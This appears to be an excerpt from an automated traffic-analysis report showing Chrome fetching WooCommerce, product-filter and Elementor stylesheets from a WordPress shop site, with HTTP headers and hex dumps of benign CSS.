                                                                                                          2024-12-12 11:58:03 UTC628OUTGET /wp-content/plugins/woocommerce-products-filter/ext/by_featured/css/by_featured.css?ver=3.3.0 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: style
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2024-12-12 11:58:04 UTC242INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:03 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Wed, 21 Dec 2022 11:20:14 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 61
                                                                                                          Cache-Control: public
                                                                                                          Connection: close
                                                                                                          Content-Type: text/css
                                                                                                          2024-12-12 11:58:04 UTC61INData Raw: 2e 77 6f 6f 66 5f 63 68 65 63 6b 62 6f 78 5f 69 6e 73 74 6f 63 6b 5f 63 6f 6e 74 61 69 6e 65 72 7b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 34 70 78 3b 0a 7d 0a 0a
                                                                                                          Data Ascii: .woof_checkbox_instock_container{ margin-bottom: 4px;}


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          15192.168.2.2449786147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:03 UTC627OUTGET /wp-content/plugins/woocommerce-products-filter/ext/color/css/html_types/color.css?ver=3.3.0 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: style
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2024-12-12 11:58:04 UTC267INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:04 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Wed, 21 Dec 2022 11:20:14 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 1408
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: public
                                                                                                          Connection: close
                                                                                                          Content-Type: text/css
                                                                                                          2024-12-12 11:58:04 UTC1408INData Raw: 2e 77 6f 6f 66 5f 73 69 64 5f 61 75 74 6f 5f 73 68 6f 72 74 63 6f 64 65 20 2e 77 6f 6f 66 5f 63 6f 6e 74 61 69 6e 65 72 5f 63 6f 6c 6f 72 7b 0a 0a 7d 0a 0a 2e 77 6f 6f 66 5f 73 69 64 5f 61 75 74 6f 5f 73 68 6f 72 74 63 6f 64 65 20 2e 77 6f 6f 66 5f 63 6f 6e 74 61 69 6e 65 72 5f 69 6e 6e 65 72 5f 63 6f 6c 6f 72 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 39 70 78 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 37 70 78 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 37 70 78 3b 0a 7d 0a 0a 75 6c 2e 77 6f 6f 66 5f 6c 69 73 74 5f 63 6f 6c 6f 72 20 6c 69 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 20 21 69 6d 70 6f 72 74 61 6e
                                                                                                          Data Ascii: .woof_sid_auto_shortcode .woof_container_color{}.woof_sid_auto_shortcode .woof_container_inner_color{ padding: 9px; background: #fff; border-radius: 7px; border-radius: 7px;}ul.woof_list_color li{ display: inline-block !importan


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          16192.168.2.2449785147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:04 UTC627OUTGET /wp-content/plugins/woocommerce-products-filter/ext/image/css/html_types/image.css?ver=3.3.0 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: style
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2024-12-12 11:58:04 UTC266INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:04 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Wed, 21 Dec 2022 11:20:14 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 682
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: public
                                                                                                          Connection: close
                                                                                                          Content-Type: text/css
                                                                                                          2024-12-12 11:58:04 UTC682INData Raw: 2e 77 6f 6f 66 5f 73 69 64 5f 61 75 74 6f 5f 73 68 6f 72 74 63 6f 64 65 20 2e 77 6f 6f 66 5f 63 6f 6e 74 61 69 6e 65 72 5f 69 6d 61 67 65 7b 20 20 20 0a 20 20 20 0a 7d 0a 0a 2e 77 6f 6f 66 5f 73 69 64 5f 61 75 74 6f 5f 73 68 6f 72 74 63 6f 64 65 20 2e 77 6f 6f 66 5f 63 6f 6e 74 61 69 6e 65 72 5f 69 6e 6e 65 72 5f 69 6d 61 67 65 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 39 70 78 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 37 70 78 3b 0a 7d 0a 0a 75 6c 2e 77 6f 6f 66 5f 6c 69 73 74 5f 69 6d 61 67 65 7b 0a 0a 7d 0a 0a 75 6c 2e 77 6f 6f 66 5f 6c 69 73 74 5f 69 6d 61 67 65 20 6c 69 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 20
                                                                                                          Data Ascii: .woof_sid_auto_shortcode .woof_container_image{ }.woof_sid_auto_shortcode .woof_container_inner_image{ padding: 9px; background: #fff; border-radius: 7px;}ul.woof_list_image{}ul.woof_list_image li { display: inline-block;


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          17192.168.2.2449788147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:05 UTC627OUTGET /wp-content/plugins/woocommerce-products-filter/ext/label/css/html_types/label.css?ver=3.3.0 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: style
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2024-12-12 11:58:05 UTC267INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:05 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Wed, 21 Dec 2022 11:20:14 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 1256
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: public
                                                                                                          Connection: close
                                                                                                          Content-Type: text/css
                                                                                                          2024-12-12 11:58:05 UTC1256INData Raw: 2e 77 6f 6f 66 5f 6c 69 73 74 5f 6c 61 62 65 6c 20 6c 69 20 2e 77 6f 6f 66 5f 6c 61 62 65 6c 5f 74 65 72 6d 3a 68 6f 76 65 72 2c 0a 2e 77 6f 6f 66 5f 6c 69 73 74 5f 6c 61 62 65 6c 20 6c 69 20 2e 77 6f 6f 66 5f 6c 61 62 65 6c 5f 74 65 72 6d 2e 63 68 65 63 6b 65 64 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 33 34 34 39 35 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 33 34 34 39 35 65 3b 0a 7d 0a 0a 0a 2e 77 6f 6f 66 5f 6c 69 73 74 5f 6c 61 62 65 6c 20 6c 69 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 32 70 78 3b 0a 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 74 6f 70 3b 0a
                                                                                                          Data Ascii: .woof_list_label li .woof_label_term:hover,.woof_list_label li .woof_label_term.checked { background-color: #34495e; border-color: #34495e;}.woof_list_label li { display: inline-block !important; margin: 2px; vertical-align: top;


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          18192.168.2.2449790147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:05 UTC629OUTGET /wp-content/plugins/woocommerce-products-filter/ext/slider/css/html_types/slider.css?ver=3.3.0 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: style
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2024-12-12 11:58:06 UTC241INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:05 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Wed, 21 Dec 2022 11:20:14 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 0
                                                                                                          Cache-Control: public
                                                                                                          Connection: close
                                                                                                          Content-Type: text/css


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          19192.168.2.2449789147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:05 UTC610OUTGET /wp-content/plugins/woocommerce/assets/css/woocommerce-layout.css?ver=6.6.1 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: style
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2024-12-12 11:58:06 UTC268INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:05 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Fri, 24 Jun 2022 09:41:10 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 17809
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: public
                                                                                                          Connection: close
                                                                                                          Content-Type: text/css
                                                                                                          2024-12-12 11:58:06 UTC16384INData Raw: 3a 72 6f 6f 74 7b 2d 2d 77 6f 6f 63 6f 6d 6d 65 72 63 65 3a 23 61 34 36 34 39 37 3b 2d 2d 77 63 2d 67 72 65 65 6e 3a 23 37 61 64 30 33 61 3b 2d 2d 77 63 2d 72 65 64 3a 23 61 30 30 3b 2d 2d 77 63 2d 6f 72 61 6e 67 65 3a 23 66 66 62 61 30 30 3b 2d 2d 77 63 2d 62 6c 75 65 3a 23 32 65 61 32 63 63 3b 2d 2d 77 63 2d 70 72 69 6d 61 72 79 3a 23 61 34 36 34 39 37 3b 2d 2d 77 63 2d 70 72 69 6d 61 72 79 2d 74 65 78 74 3a 77 68 69 74 65 3b 2d 2d 77 63 2d 73 65 63 6f 6e 64 61 72 79 3a 23 65 62 65 39 65 62 3b 2d 2d 77 63 2d 73 65 63 6f 6e 64 61 72 79 2d 74 65 78 74 3a 23 35 31 35 31 35 31 3b 2d 2d 77 63 2d 68 69 67 68 6c 69 67 68 74 3a 23 37 37 61 34 36 34 3b 2d 2d 77 63 2d 68 69 67 68 6c 69 67 68 2d 74 65 78 74 3a 77 68 69 74 65 3b 2d 2d 77 63 2d 63 6f 6e 74 65 6e 74
                                                                                                          Data Ascii: :root{--woocommerce:#a46497;--wc-green:#7ad03a;--wc-red:#a00;--wc-orange:#ffba00;--wc-blue:#2ea2cc;--wc-primary:#a46497;--wc-primary-text:white;--wc-secondary:#ebe9eb;--wc-secondary-text:#515151;--wc-highlight:#77a464;--wc-highligh-text:white;--wc-content
                                                                                                          2024-12-12 11:58:06 UTC1425INData Raw: 75 72 74 65 65 6e 20 2e 74 66 77 63 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 33 30 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 33 30 70 78 7d 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 32 31 38 70 78 29 7b 2e 74 77 65 6e 74 79 66 6f 75 72 74 65 65 6e 20 2e 74 66 77 63 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 35 34 70 78 7d 2e 66 75 6c 6c 2d 77 69 64 74 68 20 2e 74 77 65 6e 74 79 66 6f 75 72 74 65 65 6e 20 2e 74 66 77 63 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 7d 2e 74 77 65 6e 74 79 66 69 66 74 65 65 6e 20 2e 74 31 35 77 63 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 37 2e 36 39 32 33 25 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 37 2e 36 39 32 33 25 3b 70 61 64 64 69 6e 67 2d 74
                                                                                                          Data Ascii: urteen .tfwc{padding-right:30px;padding-left:30px}}@media screen and (min-width:1218px){.twentyfourteen .tfwc{margin-right:54px}.full-width .twentyfourteen .tfwc{margin-right:auto}}.twentyfifteen .t15wc{padding-left:7.6923%;padding-right:7.6923%;padding-t


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          20192.168.2.2449791147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:05 UTC603OUTGET /wp-content/plugins/woocommerce/assets/css/woocommerce.css?ver=6.6.1 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: style
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2024-12-12 11:58:06 UTC268INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:05 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Fri, 24 Jun 2022 09:41:10 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 62755
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: public
                                                                                                          Connection: close
                                                                                                          Content-Type: text/css
                                                                                                          2024-12-12 11:58:06 UTC16384INData Raw: 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 3a 72 6f 6f 74 7b 2d 2d 77 6f 6f 63 6f 6d 6d 65 72 63 65 3a 23 61 34 36 34 39 37 3b 2d 2d 77 63 2d 67 72 65 65 6e 3a 23 37 61 64 30 33 61 3b 2d 2d 77 63 2d 72 65 64 3a 23 61 30 30 3b 2d 2d 77 63 2d 6f 72 61 6e 67 65 3a 23 66 66 62 61 30 30 3b 2d 2d 77 63 2d 62 6c 75 65 3a 23 32 65 61 32 63 63 3b 2d 2d 77 63 2d 70 72 69 6d 61 72 79 3a 23 61 34 36 34 39 37 3b 2d 2d 77 63 2d 70 72 69 6d 61 72 79 2d 74 65 78 74 3a 77 68 69 74 65 3b 2d 2d 77 63 2d 73 65 63 6f 6e 64 61 72 79 3a 23 65 62 65 39 65 62 3b 2d 2d 77 63 2d 73 65 63 6f 6e 64 61 72 79 2d 74 65 78 74 3a 23 35 31 35 31 35 31 3b 2d 2d 77 63 2d 68 69 67 68 6c 69 67 68 74 3a 23 37 37 61 34 36 34 3b 2d 2d 77 63 2d 68 69 67 68 6c 69 67 68 2d 74 65 78 74 3a 77
                                                                                                          Data Ascii: @charset "UTF-8";:root{--woocommerce:#a46497;--wc-green:#7ad03a;--wc-red:#a00;--wc-orange:#ffba00;--wc-blue:#2ea2cc;--wc-primary:#a46497;--wc-primary-text:white;--wc-secondary:#ebe9eb;--wc-secondary-text:#515151;--wc-highlight:#77a464;--wc-highligh-text:w
                                                                                                          2024-12-12 11:58:06 UTC16384INData Raw: 62 6c 65 64 5b 64 69 73 61 62 6c 65 64 5d 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 61 2e 62 75 74 74 6f 6e 2e 64 69 73 61 62 6c 65 64 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 61 2e 62 75 74 74 6f 6e 3a 64 69 73 61 62 6c 65 64 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 61 2e 62 75 74 74 6f 6e 3a 64 69 73 61 62 6c 65 64 5b 64 69 73 61 62 6c 65 64 5d 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 62 75 74 74 6f 6e 2e 62 75 74 74 6f 6e 2e 64 69 73 61 62 6c 65 64 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 62 75 74 74 6f 6e 2e 62 75 74 74 6f 6e 3a 64 69 73 61 62 6c 65 64 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 62 75 74 74 6f 6e 2e 62 75 74 74 6f 6e 3a 64 69 73 61 62 6c 65 64 5b 64 69 73 61 62 6c 65 64 5d 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 69 6e 70 75 74 2e
                                                                                                          Data Ascii: bled[disabled],.woocommerce a.button.disabled,.woocommerce a.button:disabled,.woocommerce a.button:disabled[disabled],.woocommerce button.button.disabled,.woocommerce button.button:disabled,.woocommerce button.button:disabled[disabled],.woocommerce input.
                                                                                                          2024-12-12 11:58:06 UTC16384INData Raw: 2d 72 69 67 68 74 3a 2e 36 31 38 65 6d 3b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 32 64 22 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 31 2e 35 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 37 35 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 7d 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 77 69 64 67 65 74 2d 6c 61 79 65 72 65 64 2d 6e 61 76 2d 6c 69 73 74 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 62 6f 72 64 65 72 3a 30 3b 6c 69 73 74 2d 73 74 79 6c 65 3a 6e 6f 6e 65 20 6f 75 74 73 69 64 65 7d 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 77 69 64 67 65 74 2d 6c 61 79 65 72 65 64 2d 6e 61 76 2d 6c 69 73
                                                                                                          Data Ascii: -right:.618em;content:"\e02d";text-decoration:none;margin-left:-1.5em;line-height:1.75;position:absolute}.woocommerce .woocommerce-widget-layered-nav-list{margin:0;padding:0;border:0;list-style:none outside}.woocommerce .woocommerce-widget-layered-nav-lis
                                                                                                          2024-12-12 11:58:06 UTC13603INData Raw: 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 77 69 64 74 68 3a 31 30 30 25 3b 70 61 64 64 69 6e 67 3a 31 65 6d 3b 6d 61 72 67 69 6e 3a 31 65 6d 20 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 39 32 65 6d 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 32 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 35 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 64 66 64 63 64 65 3b 63 6f 6c 6f 72 3a 23 35 31 35 31 35 31 7d 23 61 64 64 5f 70 61 79 6d 65 6e 74 5f 6d 65 74 68 6f 64 20 23 70 61 79 6d 65 6e 74 20 64 69 76 2e 70 61 79 6d 65 6e 74 5f 62 6f 78 20 69 6e 70 75 74 2e 69 6e 70 75 74 2d 74 65 78 74 2c 23 61 64 64 5f 70 61 79 6d 65 6e 74 5f 6d 65 74 68 6f 64 20 23 70 61 79 6d 65 6e 74 20 64 69 76 2e 70 61 79 6d 65 6e 74 5f 62 6f 78 20 74 65 78 74
                                                                                                          Data Ascii: -sizing:border-box;width:100%;padding:1em;margin:1em 0;font-size:.92em;border-radius:2px;line-height:1.5;background-color:#dfdcde;color:#515151}#add_payment_method #payment div.payment_box input.input-text,#add_payment_method #payment div.payment_box text


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          21192.168.2.2449792147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:06 UTC621OUTGET /wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css?ver=5.15.0 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: style
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2024-12-12 11:58:06 UTC268INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:06 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Fri, 25 Mar 2022 21:30:22 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 19128
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: public
                                                                                                          Connection: close
                                                                                                          Content-Type: text/css
                                                                                                          2024-12-12 11:58:06 UTC16384INData Raw: 2f 2a 21 20 65 6c 65 6d 65 6e 74 6f 72 2d 69 63 6f 6e 73 20 2d 20 76 35 2e 31 35 2e 30 20 2d 20 33 30 2d 30 31 2d 32 30 32 32 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 65 69 63 6f 6e 73 3b 73 72 63 3a 75 72 6c 28 2e 2e 2f 66 6f 6e 74 73 2f 65 69 63 6f 6e 73 2e 65 6f 74 3f 35 2e 31 35 2e 30 29 3b 73 72 63 3a 75 72 6c 28 2e 2e 2f 66 6f 6e 74 73 2f 65 69 63 6f 6e 73 2e 65 6f 74 3f 35 2e 31 35 2e 30 23 69 65 66 69 78 29 20 66 6f 72 6d 61 74 28 22 65 6d 62 65 64 64 65 64 2d 6f 70 65 6e 74 79 70 65 22 29 2c 75 72 6c 28 2e 2e 2f 66 6f 6e 74 73 2f 65 69 63 6f 6e 73 2e 77 6f 66 66 32 3f 35 2e 31 35 2e 30 29 20 66 6f 72 6d 61 74 28 22 77 6f 66 66 32 22 29 2c 75 72 6c 28 2e 2e 2f 66 6f 6e 74 73 2f 65 69 63 6f 6e 73 2e 77 6f 66
                                                                                                          Data Ascii: /*! elementor-icons - v5.15.0 - 30-01-2022 */@font-face{font-family:eicons;src:url(../fonts/eicons.eot?5.15.0);src:url(../fonts/eicons.eot?5.15.0#iefix) format("embedded-opentype"),url(../fonts/eicons.woff2?5.15.0) format("woff2"),url(../fonts/eicons.wof
